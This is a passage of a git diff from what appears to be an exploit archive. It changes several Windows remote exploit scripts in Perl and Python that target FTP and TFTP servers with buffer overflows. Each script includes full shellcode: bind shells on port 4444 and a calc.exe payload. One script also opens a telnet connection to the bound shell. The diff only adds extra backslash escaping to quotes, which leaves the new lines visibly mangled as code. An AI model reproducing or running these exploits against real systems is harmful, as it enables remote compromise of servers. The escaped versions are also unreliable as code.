-$victim = IO::Socket::INET->new(Proto=>'udp',
+$victim = IO::Socket::INET->new(Proto=>\\\'udp\\\',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>$ARGV[1])
-                            or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
-$pad = "\x90"x63;
+                            or die \\\"Cannot connect to $ARGV[0] sulla porta $ARGV[1]\\\";
+$pad = \\\"\\\\x90\\\"x63;
 
 # win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
 
-$shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf1".
-"\xf1\x59\x06\x83\xeb\xfc\xe2\xf4\x0d\x19\x1d\x06\xf1\xf1\xd2\x43".
-"\xcd\x7a\x25\x03\x89\xf0\xb6\x8d\xbe\xe9\xd2\x59\xd1\xf0\xb2\x4f".
-"\x7a\xc5\xd2\x07\x1f\xc0\x99\x9f\x5d\x75\x99\x72\xf6\x30\x93\x0b".
-"\xf0\x33\xb2\xf2\xca\xa5\x7d\x02\x84\x14\xd2\x59\xd5\xf0\xb2\x60".
-"\x7a\xfd\x12\x8d\xae\xed\x58\xed\x7a\xed\xd2\x07\x1a\x78\x05\x22".
-"\xf5\x32\x68\xc6\x95\x7a\x19\x36\x74\x31\x21\x0a\x7a\xb1\x55\x8d".
-"\x81\xed\xf4\x8d\x99\xf9\xb2\x0f\x7a\x71\xe9\x06\xf1\xf1\xd2\x6e".
-"\xcd\xae\x68\xf0\x91\xa7\xd0\xfe\x72\x31\x22\x56\x99\x01\xd3\x02".
-"\xae\x99\xc1\xf8\x7b\xff\x0e\xf9\x16\x92\x38\x6a\x92\xdf\x3c\x7e".
-"\x94\xf1\x59\x06";
+$shellcode = \\\"\\\\x33\\\\xc9\\\\x83\\\\xe9\\\\xdd\\\\xd9\\\\xee\\\\xd9\\\\x74\\\\x24\\\\xf4\\\\x5b\\\\x81\\\\x73\\\\x13\\\\xf1\\\".
+\\\"\\\\xf1\\\\x59\\\\x06\\\\x83\\\\xeb\\\\xfc\\\\xe2\\\\xf4\\\\x0d\\\\x19\\\\x1d\\\\x06\\\\xf1\\\\xf1\\\\xd2\\\\x43\\\".
+\\\"\\\\xcd\\\\x7a\\\\x25\\\\x03\\\\x89\\\\xf0\\\\xb6\\\\x8d\\\\xbe\\\\xe9\\\\xd2\\\\x59\\\\xd1\\\\xf0\\\\xb2\\\\x4f\\\".
+\\\"\\\\x7a\\\\xc5\\\\xd2\\\\x07\\\\x1f\\\\xc0\\\\x99\\\\x9f\\\\x5d\\\\x75\\\\x99\\\\x72\\\\xf6\\\\x30\\\\x93\\\\x0b\\\".
+\\\"\\\\xf0\\\\x33\\\\xb2\\\\xf2\\\\xca\\\\xa5\\\\x7d\\\\x02\\\\x84\\\\x14\\\\xd2\\\\x59\\\\xd5\\\\xf0\\\\xb2\\\\x60\\\".
+\\\"\\\\x7a\\\\xfd\\\\x12\\\\x8d\\\\xae\\\\xed\\\\x58\\\\xed\\\\x7a\\\\xed\\\\xd2\\\\x07\\\\x1a\\\\x78\\\\x05\\\\x22\\\".
+\\\"\\\\xf5\\\\x32\\\\x68\\\\xc6\\\\x95\\\\x7a\\\\x19\\\\x36\\\\x74\\\\x31\\\\x21\\\\x0a\\\\x7a\\\\xb1\\\\x55\\\\x8d\\\".
+\\\"\\\\x81\\\\xed\\\\xf4\\\\x8d\\\\x99\\\\xf9\\\\xb2\\\\x0f\\\\x7a\\\\x71\\\\xe9\\\\x06\\\\xf1\\\\xf1\\\\xd2\\\\x6e\\\".
+\\\"\\\\xcd\\\\xae\\\\x68\\\\xf0\\\\x91\\\\xa7\\\\xd0\\\\xfe\\\\x72\\\\x31\\\\x22\\\\x56\\\\x99\\\\x01\\\\xd3\\\\x02\\\".
+\\\"\\\\xae\\\\x99\\\\xc1\\\\xf8\\\\x7b\\\\xff\\\\x0e\\\\xf9\\\\x16\\\\x92\\\\x38\\\\x6a\\\\x92\\\\xdf\\\\x3c\\\\x7e\\\".
+\\\"\\\\x94\\\\xf1\\\\x59\\\\x06\\\";
 
-#$eip="\x42\x42\x42\x42";
-$eip="\xf4\xf5\xe3\x75";	#call [ESP+28] in IMM32.dll on win2k Server SP4 Italian 
+#$eip=\\\"\\\\x42\\\\x42\\\\x42\\\\x42\\\";
+$eip=\\\"\\\\xf4\\\\xf5\\\\xe3\\\\x75\\\";	#call [ESP+28] in IMM32.dll on win2k Server SP4 Italian 
 
 
 
-$mode = "netascii";
+$mode = \\\"netascii\\\";
 
-$exploit = "\x00\x02" . $pad . $shellcode . $eip . "\0"  . $mode . "\0";
+$exploit = \\\"\\\\x00\\\\x02\\\" . $pad . $shellcode . $eip . \\\"\\\\0\\\"  . $mode . \\\"\\\\0\\\";
 
 
 print $victim $exploit;
 
-print " + Malicious request sent ...\n";
+print \\\" + Malicious request sent ...\\\\n\\\";
 
 sleep(2);
 
-print "Done.\n";
+print \\\"Done.\\\\n\\\";
 
 close($victim);
 exit;
diff --git a/platforms/windows/remote/31254.py b/platforms/windows/remote/31254.py
index 5c489c400..5c1f68150 100755
--- a/platforms/windows/remote/31254.py
+++ b/platforms/windows/remote/31254.py
@@ -8,56 +8,56 @@ import socket as s
 from sys import argv
 #
 if(len(argv) != 4):
-    print "USAGE: %s host <user> <password>" % argv[0]
+    print \"USAGE: %s host <user> <password>\" % argv[0]
     exit(1)
 else:
     #store command line arguments
     script,host,fuser,fpass=argv
     #vars
-    junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
-    espaddress = '\x59\x06\xbb\x76' # 76BB0659
-    nops = '\x90' * 10
+    junk = \'\\x41\' * 2011 #overwrite function (ABOR) with garbage/junk chars
+    espaddress = \'\\x59\\x06\\xbb\\x76\' # 76BB0659
+    nops = \'\\x90\' * 10
     shellcode = ( # BIND SHELL | PORT 4444
-        "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
-        "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
-        "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
-        "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
-        "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
-        "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
-        "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
-        "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
-        "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
-        "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
-        "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
-        "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
-        "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
-        "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
-        "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
-        "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
-        "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
-        "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
-        "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
-        "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
-        "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
-        "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
-        "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
-        "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
-        "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd")
+        \"\\x31\\xc9\\xdb\\xcd\\xbb\\xb3\\x93\\x96\\x9d\\xb1\\x56\\xd9\\x74\\x24\\xf4\"
+        \"\\x5a\\x31\\x5a\\x17\\x83\\xea\\xfc\\x03\\x5a\\x13\\x51\\x66\\x6a\\x75\\x1c\"
+        \"\\x89\\x93\\x86\\x7e\\x03\\x76\\xb7\\xac\\x77\\xf2\\xea\\x60\\xf3\\x56\\x07\"
+        \"\\x0b\\x51\\x43\\x9c\\x79\\x7e\\x64\\x15\\x37\\x58\\x4b\\xa6\\xf6\\x64\\x07\"
+        \"\\x64\\x99\\x18\\x5a\\xb9\\x79\\x20\\x95\\xcc\\x78\\x65\\xc8\\x3f\\x28\\x3e\"
+        \"\\x86\\x92\\xdc\\x4b\\xda\\x2e\\xdd\\x9b\\x50\\x0e\\xa5\\x9e\\xa7\\xfb\\x1f\"
+        \"\\xa0\\xf7\\x54\\x14\\xea\\xef\\xdf\\x72\\xcb\\x0e\\x33\\x61\\x37\\x58\\x38\"
+        \"\\x51\\xc3\\x5b\\xe8\\xa8\\x2c\\x6a\\xd4\\x66\\x13\\x42\\xd9\\x77\\x53\\x65\"
+        \"\\x02\\x02\\xaf\\x95\\xbf\\x14\\x74\\xe7\\x1b\\x91\\x69\\x4f\\xef\\x01\\x4a\"
+        \"\\x71\\x3c\\xd7\\x19\\x7d\\x89\\x9c\\x46\\x62\\x0c\\x71\\xfd\\x9e\\x85\\x74\"
+        \"\\xd2\\x16\\xdd\\x52\\xf6\\x73\\x85\\xfb\\xaf\\xd9\\x68\\x04\\xaf\\x86\\xd5\"
+        \"\\xa0\\xbb\\x25\\x01\\xd2\\xe1\\x21\\xe6\\xe8\\x19\\xb2\\x60\\x7b\\x69\\x80\"
+        \"\\x2f\\xd7\\xe5\\xa8\\xb8\\xf1\\xf2\\xcf\\x92\\x45\\x6c\\x2e\\x1d\\xb5\\xa4\"
+        \"\\xf5\\x49\\xe5\\xde\\xdc\\xf1\\x6e\\x1f\\xe0\\x27\\x20\\x4f\\x4e\\x98\\x80\"
+        \"\\x3f\\x2e\\x48\\x68\\x2a\\xa1\\xb7\\x88\\x55\\x6b\\xce\\x8f\\x9b\\x4f\\x82\"
+        \"\\x67\\xde\\x6f\\x34\\x2b\\x57\\x89\\x5c\\xc3\\x31\\x01\\xc9\\x21\\x66\\x9a\"
+        \"\\x6e\\x5a\\x4c\\xb6\\x27\\xcc\\xd8\\xd0\\xf0\\xf3\\xd8\\xf6\\x52\\x58\\x70\"
+        \"\\x91\\x20\\xb2\\x45\\x80\\x36\\x9f\\xed\\xcb\\x0e\\x77\\x67\\xa2\\xdd\\xe6\"
+        \"\\x78\\xef\\xb6\\x8b\\xeb\\x74\\x47\\xc2\\x17\\x23\\x10\\x83\\xe6\\x3a\\xf4\"
+        \"\\x39\\x50\\x95\\xeb\\xc0\\x04\\xde\\xa8\\x1e\\xf5\\xe1\\x31\\xd3\\x41\\xc6\"
+        \"\\x21\\x2d\\x49\\x42\\x16\\xe1\\x1c\\x1c\\xc0\\x47\\xf7\\xee\\xba\\x11\\xa4\"
+        \"\\xb8\\x2a\\xe4\\x86\\x7a\\x2d\\xe9\\xc2\\x0c\\xd1\\x5b\\xbb\\x48\\xed\\x53\"
+        \"\\x2b\\x5d\\x96\\x8e\\xcb\\xa2\\x4d\\x0b\\xfb\\xe8\\xcc\\x3d\\x94\\xb4\\x84\"
+        \"\\x7c\\xf9\\x46\\x73\\x42\\x04\\xc5\\x76\\x3a\\xf3\\xd5\\xf2\\x3f\\xbf\\x51\"
+        \"\\xee\\x4d\\xd0\\x37\\x10\\xe2\\xd1\\x1d\\x1a\\xcd\")
     sploit = junk+espaddress+nops+shellcode
     #create socket
     conn = s.socket(s.AF_INET,s.SOCK_STREAM)
     #establish connection to server
     conn.connect((host,21))
     #post ftp user
-    conn.send('USER '+fuser+'\r\n')
+    conn.send(\'USER \'+fuser+\'\\r\\n\')
     #wait for response
     uf = conn.recv(1024)
     #post ftp password
-    conn.send('PASS '+fpass+'\r\n')
+    conn.send(\'PASS \'+fpass+\'\\r\\n\')
     #wait for response
     pf = conn.recv(1024)
     #send ftp command with sploit
-    conn.send('ABOR '+sploit+'\r\n')
+    conn.send(\'ABOR \'+sploit+\'\\r\\n\')
     cf = conn.recv(1024)
     #close connection
     conn.close()
diff --git a/platforms/windows/remote/31255.py b/platforms/windows/remote/31255.py
index f8fa843ec..23a10be83 100755
--- a/platforms/windows/remote/31255.py
+++ b/platforms/windows/remote/31255.py
@@ -8,56 +8,56 @@ import socket as s
 from sys import argv
 #
 if(len(argv) != 4):
-    print "USAGE: %s host <user> <password>" % argv[0]
+    print \"USAGE: %s host <user> <password>\" % argv[0]
     exit(1)
 else:
     #store command line arguments
     script,host,fuser,fpass=argv
     #vars
-    junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars
-    espaddress = '\x59\x06\xbb\x76' # 76BB0659
-    nops = '\x90' * 10
+    junk = \'\\x41\' * 2012 #overwrite function (CWD) with garbage/junk chars
+    espaddress = \'\\x59\\x06\\xbb\\x76\' # 76BB0659
+    nops = \'\\x90\' * 10
     shellcode = ( # BIND SHELL | PORT 4444
-        "\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
-        "\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
-        "\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
-        "\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
-        "\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
-        "\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
-        "\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
-        "\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
-        "\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
-        "\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
-        "\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
-        "\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
-        "\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
-        "\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
-        "\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
-        "\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
-        "\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
-        "\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
-        "\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
-        "\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
-        "\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
-        "\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
-        "\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
-        "\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
-        "\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a\xcd")
+        \"\\x31\\xc9\\xdb\\xcd\\xbb\\xb3\\x93\\x96\\x9d\\xb1\\x56\\xd9\\x74\\x24\\xf4\"
+        \"\\x5a\\x31\\x5a\\x17\\x83\\xea\\xfc\\x03\\x5a\\x13\\x51\\x66\\x6a\\x75\\x1c\"
+        \"\\x89\\x93\\x86\\x7e\\x03\\x76\\xb7\\xac\\x77\\xf2\\xea\\x60\\xf3\\x56\\x07\"
+        \"\\x0b\\x51\\x43\\x9c\\x79\\x7e\\x64\\x15\\x37\\x58\\x4b\\xa6\\xf6\\x64\\x07\"
+        \"\\x64\\x99\\x18\\x5a\\xb9\\x79\\x20\\x95\\xcc\\x78\\x65\\xc8\\x3f\\x28\\x3e\"
+        \"\\x86\\x92\\xdc\\x4b\\xda\\x2e\\xdd\\x9b\\x50\\x0e\\xa5\\x9e\\xa7\\xfb\\x1f\"
+        \"\\xa0\\xf7\\x54\\x14\\xea\\xef\\xdf\\x72\\xcb\\x0e\\x33\\x61\\x37\\x58\\x38\"
+        \"\\x51\\xc3\\x5b\\xe8\\xa8\\x2c\\x6a\\xd4\\x66\\x13\\x42\\xd9\\x77\\x53\\x65\"
+        \"\\x02\\x02\\xaf\\x95\\xbf\\x14\\x74\\xe7\\x1b\\x91\\x69\\x4f\\xef\\x01\\x4a\"
+        \"\\x71\\x3c\\xd7\\x19\\x7d\\x89\\x9c\\x46\\x62\\x0c\\x71\\xfd\\x9e\\x85\\x74\"
+        \"\\xd2\\x16\\xdd\\x52\\xf6\\x73\\x85\\xfb\\xaf\\xd9\\x68\\x04\\xaf\\x86\\xd5\"
+        \"\\xa0\\xbb\\x25\\x01\\xd2\\xe1\\x21\\xe6\\xe8\\x19\\xb2\\x60\\x7b\\x69\\x80\"
+        \"\\x2f\\xd7\\xe5\\xa8\\xb8\\xf1\\xf2\\xcf\\x92\\x45\\x6c\\x2e\\x1d\\xb5\\xa4\"
+        \"\\xf5\\x49\\xe5\\xde\\xdc\\xf1\\x6e\\x1f\\xe0\\x27\\x20\\x4f\\x4e\\x98\\x80\"
+        \"\\x3f\\x2e\\x48\\x68\\x2a\\xa1\\xb7\\x88\\x55\\x6b\\xce\\x8f\\x9b\\x4f\\x82\"
+        \"\\x67\\xde\\x6f\\x34\\x2b\\x57\\x89\\x5c\\xc3\\x31\\x01\\xc9\\x21\\x66\\x9a\"
+        \"\\x6e\\x5a\\x4c\\xb6\\x27\\xcc\\xd8\\xd0\\xf0\\xf3\\xd8\\xf6\\x52\\x58\\x70\"
+        \"\\x91\\x20\\xb2\\x45\\x80\\x36\\x9f\\xed\\xcb\\x0e\\x77\\x67\\xa2\\xdd\\xe6\"
+        \"\\x78\\xef\\xb6\\x8b\\xeb\\x74\\x47\\xc2\\x17\\x23\\x10\\x83\\xe6\\x3a\\xf4\"
+        \"\\x39\\x50\\x95\\xeb\\xc0\\x04\\xde\\xa8\\x1e\\xf5\\xe1\\x31\\xd3\\x41\\xc6\"
+        \"\\x21\\x2d\\x49\\x42\\x16\\xe1\\x1c\\x1c\\xc0\\x47\\xf7\\xee\\xba\\x11\\xa4\"
+        \"\\xb8\\x2a\\xe4\\x86\\x7a\\x2d\\xe9\\xc2\\x0c\\xd1\\x5b\\xbb\\x48\\xed\\x53\"
+        \"\\x2b\\x5d\\x96\\x8e\\xcb\\xa2\\x4d\\x0b\\xfb\\xe8\\xcc\\x3d\\x94\\xb4\\x84\"
+        \"\\x7c\\xf9\\x46\\x73\\x42\\x04\\xc5\\x76\\x3a\\xf3\\xd5\\xf2\\x3f\\xbf\\x51\"
+        \"\\xee\\x4d\\xd0\\x37\\x10\\xe2\\xd1\\x1d\\x1a\\xcd\")
     sploit = junk+espaddress+nops+shellcode
     #create socket
     conn = s.socket(s.AF_INET,s.SOCK_STREAM)
     #establish connection to server
     conn.connect((host,21))
     #post ftp user
-    conn.send('USER '+fuser+'\r\n')
+    conn.send(\'USER \'+fuser+\'\\r\\n\')
     #wait for response
     uf = conn.recv(1024)
     #post ftp password
-    conn.send('PASS '+fpass+'\r\n')
+    conn.send(\'PASS \'+fpass+\'\\r\\n\')
     #wait for response
     pf = conn.recv(1024)
     #send ftp command with sploit
-    conn.send('CWD '+sploit+'\r\n')
+    conn.send(\'CWD \'+sploit+\'\\r\\n\')
     cf = conn.recv(1024)
     #close connection
     conn.close()
diff --git a/platforms/windows/remote/3132.pl b/platforms/windows/remote/3132.pl
index c42fc26d2..3e06b557a 100755
--- a/platforms/windows/remote/3132.pl
+++ b/platforms/windows/remote/3132.pl
@@ -3,64 +3,64 @@ use IO::Socket;
 
 if(!($ARGV[1]))
 {
- print "Usage: tftpdwin-0-4-2.pl <target host> <port>\n\n";
+ print \"Usage: tftpdwin-0-4-2.pl <target host> <port>\\n\\n\";
  exit;
 }
 
-$victim = IO::Socket::INET->new(Proto=>'udp',
+$victim = IO::Socket::INET->new(Proto=>\'udp\',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>$ARGV[1])
-                            or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
+                            or die \"Cannot connect to $ARGV[0] sulla porta $ARGV[1]\";
 
-my $nop0="\x90"x15;
+my $nop0=\"\\x90\"x15;
 
 #8BC3           MOV EAX,EBX
 #66:05 1201     ADD AX,112
 #50             PUSH EAX
 #C3             RETN
 
-my $asm="\x8b\xc3\x66\x05\x12\x01\x50\xc3";
+my $asm=\"\\x8b\\xc3\\x66\\x05\\x12\\x01\\x50\\xc3\";
 
-my $nop="\x90"x57;
+my $nop=\"\\x90\"x57;
 
-my $nop1="\x90"x7;
+my $nop1=\"\\x90\"x7;
 
-my $eip="\x42\xfb\x61\x40";# pop ebp,ret in tftpd.exe
-#my $eip="B"x4;
+my $eip=\"\\x42\\xfb\\x61\\x40\";# pop ebp,ret in tftpd.exe
+#my $eip=\"B\"x4;
 
 #A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
 #1)bind port, in this exploit is 4444 in the original shellcode was 6666
 #2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
 $shellcode = 
-"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
-"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
-"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
-"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
-"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
-"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
-"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
-"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
-"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
-"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
-"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
-"\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50".
-"\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8";
+\"\\x59\\x81\\xc9\\xd3\\x62\\x30\\x20\\x41\\x43\\x4d\\x64\".
+\"\\x64\\x99\\x96\\x8D\\x7E\\xE8\\x64\\x8B\\x5A\\x30\\x8B\\x4B\\x0C\\x8B\\x49\\x1C\".
+\"\\x8B\\x09\\x8B\\x69\\x08\\xB6\\x03\\x2B\\xE2\\x66\\xBA\\x33\\x32\\x52\\x68\\x77\".
+\"\\x73\\x32\\x5F\\x54\\xAC\\x3C\\xD3\\x75\\x06\\x95\\xFF\\x57\\xF4\\x95\\x57\\x60\".
+\"\\x8B\\x45\\x3C\\x8B\\x4C\\x05\\x78\\x03\\xCD\\x8B\\x59\\x20\\x03\\xDD\\x33\\xFF\".
+\"\\x47\\x8B\\x34\\xBB\\x03\\xF5\\x99\\xAC\\x34\\x71\\x2A\\xD0\\x3C\\x71\\x75\\xF7\".
+\"\\x3A\\x54\\x24\\x1C\\x75\\xEA\\x8B\\x59\\x24\\x03\\xDD\\x66\\x8B\\x3C\\x7B\\x8B\".
+\"\\x59\\x1C\\x03\\xDD\\x03\\x2C\\xBB\\x95\\x5F\\xAB\\x57\\x61\\x3B\\xF7\\x75\\xB4\".
+\"\\x5E\\x54\\x6A\\x02\\xAD\\xFF\\xD0\\x88\\x46\\x13\\x8D\\x48\\x30\\x8B\\xFC\\xF3\".
+\"\\xAB\\x40\\x50\\x40\\x50\\xAD\\xFF\\xD0\\x95\\xB8\\x02\\xFF\\x11\\x5c\\x32\\xE4\".
+\"\\x50\\x54\\x55\\xAD\\xFF\\xD0\\x85\\xC0\\x74\\xF8\\xFE\\x44\\x24\\x2D\\xFE\\x44\".
+\"\\x24\\x2c\\x83\\xEF\\x6C\\xAB\\xAB\\xAB\\x58\\x54\\x54\\x50\\x50\\x50\\x54\\x50\".
+\"\\x50\\x56\\x50\\xFF\\x56\\xE4\\xFF\\x56\\xE8\";
 
-$exploit = "\x00\x01" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. "\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";
+$exploit = \"\\x00\\x01\" . $nop0 .$asm.$nop. $shellcode. $nop1 .$eip. \"\\x00\\x6e\\x65\\x74\\x61\\x73\\x63\\x69\\x69\\x00\";
 
 print $victim $exploit;
 
-print " + Malicious request sent ...\n";
+print \" + Malicious request sent ...\\n\";
 
 sleep(2);
 
-print "Done.\n";
+print \"Done.\\n\";
 
 close($victim);
 $host = $ARGV[0];
-print " + connect to 4444 port of $host ...\n";
+print \" + connect to 4444 port of $host ...\\n\";
 sleep(3);
-system("telnet $host 4444");
+system(\"telnet $host 4444\");
 exit;
 
 # milw0rm.com [2007-01-15]
diff --git a/platforms/windows/remote/3140.pl b/platforms/windows/remote/3140.pl
index f01bc0e73..e0af7fce5 100755
--- a/platforms/windows/remote/3140.pl
+++ b/platforms/windows/remote/3140.pl
@@ -21,8 +21,8 @@
 #          		You are responsible for yourself for what you do with this code.
 #
 #
-#	    Note:	After executing the exploit You will get "Cannot login User or password not correct."
-#			That doesn't mean exploit failed whenever you click on Sami FTP server it will crash 
+#	    Note:	After executing the exploit You will get \"Cannot login User or password not correct.\"
+#			That doesn\'t mean exploit failed whenever you click on Sami FTP server it will crash 
 #			resulting in the execution of calc.exe and will execute whenever the SAMI FTP server 
 #			restarts until it is reinstalled.
 
@@ -30,30 +30,30 @@
 use Net::FTP;
 
 
-print "Coded by UmZ! umz32.dll@gmail.com\n";
-print "http://www.secure-bytes.com/exploits/\n";
+print \"Coded by UmZ! umz32.dll@gmail.com\\n\";
+print \"http://www.secure-bytes.com/exploits/\\n\";
 	
-$ftp = Net::FTP->new("192.168.100.250", Debug => 0) or die "Cannot connect : $@";
+$ftp = Net::FTP->new(\"192.168.100.250\", Debug => 0) or die \"Cannot connect : $@\";
 
-my $msg ="\x90" x596;      #140
-my $msg2 ="B"x484;
-my $shellcode =  "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8".
-		 "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1".
-		 "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07".
-		 "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25".
-		 "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5".
-		 "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d".
-		 "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4".
-		 "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0".
-		 "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c".
-		 "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b".
-		 "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4";
+my $msg =\"\\x90\" x596;      #140
+my $msg2 =\"B\"x484;
